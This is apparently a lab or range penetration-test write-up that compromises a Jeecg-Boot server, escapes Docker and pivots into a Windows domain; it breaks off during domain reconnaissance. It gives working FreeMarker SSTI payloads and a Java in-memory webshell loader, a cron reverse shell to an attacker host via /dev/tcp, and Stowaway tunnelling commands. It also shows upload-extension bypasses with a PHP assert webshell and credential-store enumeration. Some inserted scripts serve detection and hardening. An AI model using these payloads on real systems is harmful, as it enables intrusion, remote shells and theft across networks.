
External Information Gathering
```shell
# nmap options: --min-rate 10000 scan at a minimum rate of 10000 packets/s; -p- all ports;
# -p80,135 scan only ports 80 and 135; -sU UDP scan; -sT TCP connect scan; -sV service version detection;
# -sC default scripts; -O OS and version detection; --script=vuln basic vulnerability scan
nmap -p- --min-rate 10000 192.168.111.22
nmap -p- -sU --min-rate 10000 192.168.111.22
nmap -p22,3306,6379,18088,18080 --script=vuln 192.168.111.22
nmap -p22,3306,6379,18088,18080 -sV -sC -sT -O 192.168.111.22
```

According to the scan results, the open ports are SSH (22), MySQL (3306), Redis (6379), Apache Tomcat returning 404 (18088) and http (18080).
External Vulnerability Probing
Brute-force SSH (22), MySQL (3306) and Redis (6379)

MySQL weak password
192.168.111.22:3306 root/root

Redis unauthenticated access
192.168.111.22:6379

http://192.168.111.22:18088/ returns 404; scan for directories

Web system
http://192.168.111.22:18088/jeecg-boot/jmreport/list

http://192.168.111.22:18080/

External Vulnerability Exploitation
MySQL RCE (failed)
For MySQL background see 国光's article MySQL Exploitation and Privilege Escalation (MySQL 漏洞利用与提权)
Mirror in case the original link is dead: MySQL Exploitation and Privilege Escalation (repost)
```sql
show global variables like '%secure_file_priv%';
```

| Value | Meaning |
|---|---|
| NULL | import and export not allowed |
| /tmp | import and export only allowed under /tmp |
| (empty) | no directory restriction |
Redis RCE (failed)
Here it is convenient to use GitHub - DeEpinGh0st/MDUT-Extend-Release: MDUT-Extend (extended version) directly
Background: Redis Unauthorized Access Exploitation Summary (Redis未授权利用总结)

http://192.168.111.22:18080/

Tried file upload and file read; both failed. A weak password exists, but the page behind it is not developed.
Weak password
```http
POST /admin/doLogin HTTP/1.1
Host: 192.168.111.22:18080
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1758269454,1758270382
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30

username=admin&password=123456
```

On login, the Shiro framework was detected; brute-forcing the key failed.


Jeecg-Boot System RCE (succeeded)
http://192.168.111.22:18088/jeecg-boot/jmreport/list

Go straight for an nday. Because the arbitrary file upload here requires being logged in, SSTI template injection was chosen instead.
GitHub - MInggongK/jeecg-: jeecg comprehensive vulnerability exploitation tool

queryFieldBySql SSTI template injection
```http
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.111.22:18088
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1758269454,1758270382
Connection: keep-alive
Content-Type: application/json
Content-Length: 99

{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"whoami \") }' "}
```

In-memory shell: GitHub - pen4uin/java-memshell-generator: a customizable Java in-memory webshell generation tool

```http
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.111.22:18088
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: Hm_lvt_5819d05c0869771ff6e6a81cdec5b2e8=1758269454,1758270382
Connection: keep-alive
Content-Type: application/json
Content-Length: 16172

{"sql":"call${\"freemarker.template.utility.ObjectConstructor\"?new()(\"javax.script.ScriptEngineManager\").getEngineByName(\"js\").eval(\"classLoader=java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apachen.SOAPUtils').newInstance();}catch(e){clsString=classLoader.loadClass('java.lang.String');bytecodeBase64='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';try{clsBase64=classLoader.loadClass('java.util.Base64');clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);}catch(ee){try{datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);}catch(eee){clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);}}clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');clsByteArray=(''.getBytes().getClass());clsInt=java.lang.Integer.TYPE;defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);clazz.newInstance();};#{1};\")}","dbSource":"","type":"0"}
```

http://192.168.111.22:18088/jeecg-boot/jmreport/queryFieldBySql
Password: test
Request header: User-Agent: Bhimaw

loadTableData SSTI template injection
```http
POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13
Content-Type: application/json; charset=utf-8
Content-Length: 165
Host: 192.168.111.22:18088
Connection: keep-alive
Accept-Encoding: gzip, deflate, br

{"dbSource":"","sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"whoami\")}'","tableName":"test_demo);","pageNo":1,"pageSize":10}
```
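Both jmreport requests above (queryFieldBySql and loadTableData) carry FreeMarker syntax inside the JSON "sql" field, which is what a WAF rule or log review should key on. The following detection script is an added example and is not code from the write-up or from the Jeecg project: it inspects (path, body) pairs, restricts itself to the two endpoints used above, and classifies a hit as critical when the `?new()` built-in or a `freemarker.template.utility` class is present. The sample requests are constructed (two are the payloads shown above, two are benign controls); pattern names and the Finding structure are my own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# JimuReport endpoints used in the requests above. Their "sql" field is rendered
# by FreeMarker before execution, so FreeMarker syntax in that field is the
# thing to look for at the WAF or in request logs.
JMREPORT_ENDPOINTS = (
    "/jeecg-boot/jmreport/queryFieldBySql",
    "/jeecg-boot/jmreport/loadTableData",
)

# Constructs that never belong in a user-supplied SQL string.
FREEMARKER_PATTERNS = {
    "builtin_new": re.compile(r"\?\s*new\s*\(", re.I),          # ?new() instantiates Java classes
    "dangerous_class": re.compile(
        r"freemarker\.template\.utility\.(Execute|ObjectConstructor|JythonRuntime)", re.I),
    "directive_assign": re.compile(r"<#\s*assign\b", re.I),     # <#assign ...> directive
    "interpolation": re.compile(r"\$\{[^}]*\}"),                  # ${...} interpolation
}
CRITICAL = {"builtin_new", "dangerous_class"}


@dataclass
class Finding:
    index: int            # position in the request list
    endpoint: str
    severity: str         # "critical" or "suspicious"
    matched: List[str] = field(default_factory=list)


def inspect_request(index: int, path: str, body: str) -> Optional[Finding]:
    """Return a Finding when a jmreport request body carries FreeMarker syntax."""
    if not any(path.startswith(ep) for ep in JMREPORT_ENDPOINTS):
        return None
    matched = [name for name, rx in FREEMARKER_PATTERNS.items() if rx.search(body)]
    if not matched:
        return None
    severity = "critical" if CRITICAL & set(matched) else "suspicious"
    return Finding(index, path, severity, matched)


def scan(requests: List[Tuple[str, str]]) -> List[Finding]:
    """Run inspect_request over (path, body) pairs and collect the findings."""
    findings = []
    for i, (path, body) in enumerate(requests):
        f = inspect_request(i, path, body)
        if f:
            findings.append(f)
    return findings


# Constructed sample: the two payloads from the write-up plus two benign requests.
SAMPLE_REQUESTS = [
    ("/jeecg-boot/jmreport/queryFieldBySql",
     '{"sql":"select \'<#assign ex=\\"freemarker.template.utility.Execute\\"?new()> ${ ex(\\"whoami \\") }\' "}'),
    ("/jeecg-boot/jmreport/loadTableData",
     '{"dbSource":"","sql":"select \'<#assign value=\\"freemarker.template.utility.Execute\\"?new()>'
     '${value(\\"whoami\\")}\'","tableName":"test_demo);","pageNo":1,"pageSize":10}'),
    ("/jeecg-boot/jmreport/loadTableData",
     '{"dbSource":"","sql":"select id, name from sys_user","pageNo":1,"pageSize":10}'),
    ("/jeecg-boot/sys/login", '{"username":"admin","password":"x"}'),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f"[{f.severity}] request #{f.index} -> {f.endpoint}: {', '.join(f.matched)}")
```

The rule only covers the two endpoints from this write-up; the durable fix is the vendor update for the JimuReport module and putting the jmreport paths behind authentication, with this rule kept as a compensating control.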

http://192.168.111.22:18080/
Found the source at /home/ubuntu/doctool.jar; download it and decompile it.

/doctool.jar!/BOOT-INF/classes/com/example/doctoolkit/shiro/ShiroConfig.class
Found the Shiro key: QZIysgMYhG7/CzIJlVpR1g==

GitHub - SummerSec/ShiroAttack2: Shiro deserialization comprehensive exploitation tool, including echo command execution and in-memory shell injection; fixes the NoCC problem of the original https://github.com/j1anFen/shiro_attack

Docker Escape
Found that we are currently inside a docker environment:
```shell
cat /proc/1/cgroup
ls -la /.dockerenv
df -h
```

Huh, what is going on here? Take another look at the Shiro environment.

Path: http://192.168.111.22:18080/test
Password: pass1024


Found a mount: a host directory is mounted into the container.

There is a flag here: flag{nItAM4shIzhenN1ubi}
Escape through the mount using a cron job
```shell
# 1. Enter the host's tmp directory
cd /dev/tmp/tmp
# 2. Create test.sh and write its contents
cat > test.sh << EOF
#!/bin/bash
bash -i >& /dev/tcp/192.168.111.25/7777 0>&1
sh -i >& /dev/tcp/192.168.111.25/7777 0>&1
/bin/sh -i >& /dev/tcp/192.168.111.25/7777 0>&1
/bin/bash -i >& /dev/tcp/192.168.111.25/7777 0>&1
/bin/bash -i >& /dev/tcp/192.168.111.25/7777 0>&1
EOF
# 3. Make it executable
chmod +x test.sh
# 4. Reverse shell via a cron job
sed -i
```

```shell
nc -lv 7777
```
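The escape above only works because a writable host directory is mounted into the container. The script below is an added example, not part of the write-up: it parses /proc/self/mountinfo, ignores the container's own overlay/proc/tmpfs mounts and the three files Docker itself bind-mounts (/etc/hosts, /etc/hostname, /etc/resolv.conf), and reports every remaining bind mount of a host path, marking writable mounts of sensitive host locations (the host root, /etc, cron spools and so on) as high risk. It also reproduces the two container indicators checked by hand above. The mountinfo and cgroup samples are constructed; the /dev/tmp mount point mirrors the one used above, the rest is invented.

```python
from dataclasses import dataclass
from typing import List

# Filesystem types that come from a real host block device; overlay, tmpfs and
# proc belong to the container itself and are ignored.
DISK_FSTYPES = {"ext4", "ext3", "xfs", "btrfs", "zfs", "f2fs"}
# Docker bind-mounts these three files from /var/lib/docker/containers/<id>/.
DOCKER_MANAGED = {"/etc/hosts", "/etc/hostname", "/etc/resolv.conf"}
# Host paths that give code inside the container a direct route onto the host
# (cron directories are what the escape above relies on). The host root "/" is
# handled separately.
HIGH_RISK_PREFIXES = ("/etc", "/root", "/home", "/var/spool/cron", "/var/run", "/run",
                      "/proc", "/sys", "/dev", "/usr", "/boot")


@dataclass
class HostMount:
    host_path: str      # path on the host (mountinfo "root" field)
    mount_point: str    # where it appears inside the container
    fstype: str
    source: str
    writable: bool
    high_risk: bool


def parse_mountinfo(text: str) -> List[dict]:
    """Parse /proc/self/mountinfo lines; the optional fields end at the '-' separator."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        sep = fields.index("-")
        entries.append({
            "root": fields[3].replace("\\040", " "),
            "mount_point": fields[4].replace("\\040", " "),
            "options": set(fields[5].split(",")),
            "fstype": fields[sep + 1],
            "source": fields[sep + 2],
        })
    return entries


def host_mounts(text: str) -> List[HostMount]:
    """Return the bind mounts that expose a host path inside the container."""
    found = []
    for e in parse_mountinfo(text):
        if e["fstype"] not in DISK_FSTYPES:
            continue
        if e["mount_point"] in DOCKER_MANAGED or e["root"].startswith("/var/lib/docker/"):
            continue
        root = e["root"]
        risky = root == "/" or any(root == p or root.startswith(p + "/") for p in HIGH_RISK_PREFIXES)
        found.append(HostMount(root, e["mount_point"], e["fstype"], e["source"],
                               "rw" in e["options"], risky))
    return found


def looks_like_container(cgroup_text: str, dockerenv_present: bool) -> bool:
    """The same two indicators checked by hand above: /.dockerenv and /proc/1/cgroup."""
    return dockerenv_present or any(k in cgroup_text for k in ("docker", "containerd", "kubepods"))


# Constructed sample: the host root mounted read-write at /dev/tmp, an application
# log directory, and the three docker-managed files that must not be reported.
SAMPLE_MOUNTINFO = """\
1166 1093 0:94 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/AAA:/var/lib/docker/overlay2/l/BBB
1167 1166 0:97 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
1168 1166 0:98 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
1171 1166 8:1 / /dev/tmp rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
1175 1166 8:1 /srv/app/logs /app/logs rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro
1172 1166 8:1 /var/lib/docker/containers/0123abcd/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda1 rw
1173 1166 8:1 /var/lib/docker/containers/0123abcd/hostname /etc/hostname rw,relatime - ext4 /dev/sda1 rw
1174 1166 8:1 /var/lib/docker/containers/0123abcd/hosts /etc/hosts rw,relatime - ext4 /dev/sda1 rw
"""
SAMPLE_CGROUP = "0::/docker/0123abcd\n"   # constructed /proc/1/cgroup content (cgroup v2 style)

if __name__ == "__main__":
    print("container indicators present:", looks_like_container(SAMPLE_CGROUP, False))
    for m in host_mounts(SAMPLE_MOUNTINFO):
        label = "HIGH RISK" if m.high_risk else "review"
        mode = "rw" if m.writable else "ro"
        print(f"[{label}] host {m.host_path} -> {m.mount_point} ({m.fstype} on {m.source}, {mode})")
```

Run inside a container, replace SAMPLE_MOUNTINFO with the contents of /proc/self/mountinfo; from the host side the same information is available via `docker inspect` under Mounts, which is the place to review before deployment.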

First Internal Network Layer
```text
root@wty-virtual-machine:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b1:3a:e7 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    inet 192.168.111.22/24 brd 192.168.111.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:feb1:3ae7/64 scope link
       valid_lft forever preferred_lft forever
3: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:b1:62:bf brd ff:ff:ff:ff:ff:ff
    altname enp2s1
    inet 192.168.80.50/24 brd 192.168.80.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:feb1:62bf/64 scope link
       valid_lft forever preferred_lft forever
4: br-2ed9e624a55e: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:86:33:b1:e6 brd ff:ff:ff:ff:ff:ff
    inet 172.20.0.1/16 brd 172.20.255.255 scope global br-2ed9e624a55e
       valid_lft forever preferred_lft forever
    inet6 fe80::42:86ff:fe33:b1e6/64 scope link
       valid_lft forever preferred_lft forever
5: br-5c4f24880ae8: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
    link/ether 02:42:90:1f:d0:a6 brd ff:ff:ff:ff:ff:ff
    inet 172.19.0.1/16 brd 172.19.255.255 scope global br-5c4f24880ae8
       valid_lft forever preferred_lft forever
6: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
    link/ether 02:42:7a:e0:9d:e5 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
7: br-a8cbb2f18fd5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:a1:8e:71:2a brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-a8cbb2f18fd5
       valid_lft forever preferred_lft forever
    inet6 fe80::42:a1ff:fe8e:712a/64 scope link
       valid_lft forever preferred_lft forever
9: vethb31e178@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-2ed9e624a55e state UP group default
    link/ether 2a:fa:8c:44:8f:42 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::28fa:8cff:fe44:8f42/64 scope link
       valid_lft forever preferred_lft forever
11: veth330c26c@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-2ed9e624a55e state UP group default
    link/ether 7a:0a:7e:fa:82:14 brd ff:ff:ff:ff:ff:ff link-netnsid 1
    inet6 fe80::780a:7eff:fefa:8214/64 scope link
       valid_lft forever preferred_lft forever
13: vethea4b282@if12: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-2ed9e624a55e state UP group default
    link/ether 46:70:f8:09:e5:9b brd ff:ff:ff:ff:ff:ff link-netnsid 2
    inet6 fe80::4470:f8ff:fe09:e59b/64 scope link
       valid_lft forever preferred_lft forever
15: veth6409444@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-a8cbb2f18fd5 state UP group default
    link/ether ea:0d:25:9a:29:33 brd ff:ff:ff:ff:ff:ff link-netnsid 3
    inet6 fe80::e80d:25ff:fe9a:2933/64 scope link
       valid_lft forever preferred_lft forever
root@wty-virtual-machine:~#
```

Upload linux_x64_agent
GitHub - ph4ntonn/Stowaway: 👻Stowaway – Multi-hop Proxy Tool for pentesters
```shell
# on the compromised host (agent), connecting back to the attacker machine
./linux_x64_agent -c 192.168.111.25:9999 -s pass --reconnect 10
# on the attacker machine (admin)
./macos_arm64_admin -l 9999 -s pass
```

```shell
# in the Stowaway admin console: select the node and open a SOCKS5 proxy
use 0
socks 55667 123 123
```

socks5://123:123@127.0.0.1:55667

Arbitrary File Upload
First look at the web assets and scan for directories.
phpmyadmin weak password root/root, but no way to get RCE from it.
http://192.168.80.55/web.php
Simple blacklist extension bypass

Here a trailing space, a trailing dot and ::$DATA were used to bypass the check; try the other methods yourself. See: File Upload Bypass Summary (文件上传绕过总结)
```http
Content-Disposition: form-data; name="fileToUpload"; filename="1.php."
Content-Disposition: form-data; name="fileToUpload"; filename="2.php "
Content-Disposition: form-data; name="fileToUpload"; filename="3.php::$DATA"
```
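The three filenames above all pass a deny-list check on the "text after the last dot" and all end up on disk as a .php file, because Windows strips trailing dots and spaces and the `::$DATA` stream suffix when it creates the file. The following is an added example, not code from the write-up or from the target application: a reconstruction of that weak check beside a hardened one that canonicalizes the name the way the filesystem will (path stripped, null byte truncated, stream suffix dropped, trailing dots and spaces removed) and then requires exactly one extension from an allow list, plus a server-generated stored name so the client never controls the path that is written. Function names and the extension sets are my own.

```python
import secrets

# Extensions the server must never store, whatever the client calls the file.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar",
                         "asp", "aspx", "jsp", "jspx"}
# Extensions an image-upload endpoint is allowed to keep.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}


def blacklist_check(filename: str) -> bool:
    """A deny-list check of the kind the three filenames above defeat (reconstructed
    for illustration, not the target's code): take the text after the last dot,
    compare it with a deny list and trust the result. "1.php.", "2.php " and
    "3.php::$DATA" all pass here, and Windows stores each of them as a .php file."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in EXECUTABLE_EXTENSIONS


def normalize_filename(filename: str) -> str:
    """Canonicalize the name the way the filesystem will, before deciding anything."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop any client-supplied path
    name = name.split("\x00", 1)[0]                          # C-level null-byte truncation
    name = name.split(":", 1)[0]                             # drop an NTFS stream (::$DATA)
    name = name.rstrip(". ")                                 # Windows strips trailing dots/spaces
    return name.lower()


def allowlist_check(filename: str) -> bool:
    """Hardened: canonicalize, then require exactly one extension from the allow list.
    Double extensions such as shell.php.jpg are rejected outright."""
    parts = normalize_filename(filename).split(".")
    if len(parts) != 2 or not parts[0]:
        return False
    return parts[1] in ALLOWED_EXTENSIONS


def stored_name(filename: str) -> str:
    """Never reuse the client's name: keep the validated extension, randomize the rest."""
    if not allowlist_check(filename):
        raise ValueError("rejected upload filename: %r" % filename)
    ext = normalize_filename(filename).rsplit(".", 1)[1]
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    # Constructed test names: the three bypasses used above plus benign and abusive controls.
    for name in ("1.php.", "2.php ", "3.php::$DATA", "shell.php", "photo.jpg", "shell.php.jpg"):
        print(f"{name!r:18} blacklist={blacklist_check(name)!s:5} allowlist={allowlist_check(name)}")
```

Serving the upload directory with script execution disabled (or from a separate static host) is the second half of the fix; the filename check alone should never be the only barrier.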



Try uploading a webshell; there is a little sensitive-function detection.
```http
POST /up.php HTTP/1.1
Host: 192.168.80.55
Content-Length: 334
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://192.168.80.55
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarychBkiANjERe4CNu8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.80.55/web.php
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundarychBkiANjERe4CNu8
Content-Disposition: form-data; name="fileToUpload"; filename="shell.php."
Content-Type: image/jpeg

<?php assert($_REQUEST['pass']); ?>
------WebKitFormBoundarychBkiANjERe4CNu8
Content-Disposition: form-data; name="submit"

上传文件
------WebKitFormBoundarychBkiANjERe4CNu8--
```

http://192.168.80.55/uploads/shell.php, password pass

```text
C:/phpStudy/PHPTutorial/WWW/uploads/ >whoami
win-p5vv23d2i7p\administrator
C:/phpStudy/PHPTutorial/WWW/uploads/ >ipconfig

Windows IP 配置


以太网适配器 本地连接 2:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::f05b:eab:519:6cc7%13
   IPv4 地址 . . . . . . . . . . . . : 192.168.81.22
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.81.1

以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::640d:66de:35a6:2e7%10
   IPv4 地址 . . . . . . . . . . . . : 192.168.80.55
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.80.1

隧道适配器 isatap.{81F64077-4CE3-4ED0-B8A3-22124C91CB3A}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :

隧道适配器 isatap.{038DAB72-5539-4785-BFF0-5DA18E9CFFEE}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :
C:/phpStudy/PHPTutorial/WWW/uploads/ >
```
Listing processes with tasklist /SVC shows Huorong (火绒) antivirus is running.

Found the second flag on the desktop: C:/Users/Administrator/Desktop/flag.txt
flag{8ASDE242NFSDJH83KSAIB3}

Second Internal Network Layer
Upload windows_x64_agent.exe and bring a proxy out through it
```shell
# Stowaway admin console: start a listener on the current node (192.168.80.50)
listen
192.168.80.50:9999
```

```shell
# on the Windows host reached through the webshell (192.168.80.55)
windows_x64_agent.exe -c 192.168.80.50:9999 -s pass --reconnect 10
```

```shell
# back in the admin console: switch to the new node and open a SOCKS5 proxy
back
use 1
socks 55668 123 123
```

Scan the 192.168.81.1/24 subnet through the proxy
socks5://123:123@127.0.0.1:55668
Quite a few hosts; just a quick scan.

Weblogic
http://192.168.81.20:7001/console/login/LoginForm.jsp
Just hook up the proxy and run the tool in one go
GitHub - KimJun1010/WeblogicTool: WeblogicTool, a GUI exploitation tool supporting vulnerability detection, command execution, in-memory shell injection, password decryption and more (powered by Sangfor Deep Blue Lab, Tianwei team)

http://192.168.81.20:7001/bea_wls_internal/test Password: pass Key: key


```text
C:/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/ >systeminfo

主机名:           WEBLOGIC
OS 名称:          Microsoft Windows Server 2012 R2 Datacenter
OS 版本:          6.3.9600 暂缺 Build 9600
OS 制造商:        Microsoft Corporation
OS 配置:          成员服务器
OS 构建类型:      Multiprocessor Free
注册的所有人:     Windows 用户
注册的组织:
产品 ID:          00253-40020-11623-AA092
初始安装日期:     2021/11/5, 16:39:33
系统启动时间:     2025/10/31, 14:37:51
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         x64-based PC
处理器:           安装了 2 个处理器。
                  [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2200 Mhz
                  [02]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2200 Mhz
BIOS 版本:        Phoenix Technologies LTD 6.00, 2020/11/12
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00)北京，重庆，香港特别行政区，乌鲁木齐
物理内存总量:     2,047 MB
可用的物理内存:   1,261 MB
虚拟内存: 最大值: 2,431 MB
虚拟内存: 可用:   1,151 MB
虚拟内存: 使用中: 1,280 MB
页面文件位置:     C:\pagefile.sys
域:               c3ting.org
登录服务器:       暂缺
修补程序:         安装了 3 个修补程序。
                  [01]: KB2919355
                  [02]: KB2919442
                  [03]: KB2999226
网卡:             安装了 2 个 NIC。
                  [01]: Intel(R) 82574L 千兆网络连接
                      连接名:      Ethernet0
                      启用 DHCP:   否
                      IP 地址
                        [01]: 192.168.81.20
                        [02]: fe80::e030:2714:368e:63a7
                  [02]: Intel(R) 82574L 千兆网络连接
                      连接名:      Ethernet1
                      启用 DHCP:   否
                      IP 地址
                        [01]: 192.168.77.25
                        [02]: fe80::5049:5fe3:1f5b:9c9c
Hyper-V 要求:     已检测到虚拟机监控程序。将不显示 Hyper-V 所需的功能。
```

```text
C:/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/ >nslookup c3ting.org
DNS request timed out.
    timeout was 2 seconds.
服务器:  UnKnown
Address:  192.168.77.250

名称:    c3ting.org
Address:  192.168.77.250

C:/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/ >nltest /dsgetdc:c3ting.org
           DC: \\WIN-LAVRSND6J6N.c3ting.org
         地址: \\192.168.77.250
     Dom Guid: ad7512fa-8407-479c-beae-66f83264f83d
     Dom 名称: c3ting.org
       林名称: c3ting.org
   DC 站点名称: Default-First-Site-Name
我们的站点名称: Default-First-Site-Name
         标志: PDC GC DS LDAP KDC TIMESERV GTIMESERV WRITABLE DNS_DC DNS_DOMAIN DNS_FOREST CLOSE_SITE FULL_SECRET WS DS_8 DS_9
此命令成功完成
```

```text
C:/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/ >ipconfig

Windows IP 配置


以太网适配器 Ethernet1:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::5049:5fe3:1f5b:9c9c%14
   IPv4 地址 . . . . . . . . . . . . : 192.168.77.25
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.77.1

以太网适配器 Ethernet0:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::e030:2714:368e:63a7%12
   IPv4 地址 . . . . . . . . . . . . : 192.168.81.20
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.81.1

隧道适配器 isatap.{8F6412DB-D757-413C-97E1-76F7DB61BD9C}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :

隧道适配器 isatap.{E7ECCBFA-0D99-4183-B53D-C83F88C7D49C}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :

C:/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/ > cmdkey /list

当前保存的凭据:

    目标: LegacyGeneric:target=C3TING\Administrator
    类型: 普通
    用户: C3TING\Administrator

    目标: LegacyGeneric:target=WEBLOGIC\Administrator
    类型: 普通
    用户: WEBLOGIC\Administrator
```
Summary of the information gathered
System information:
  Hostname: WEBLOGIC
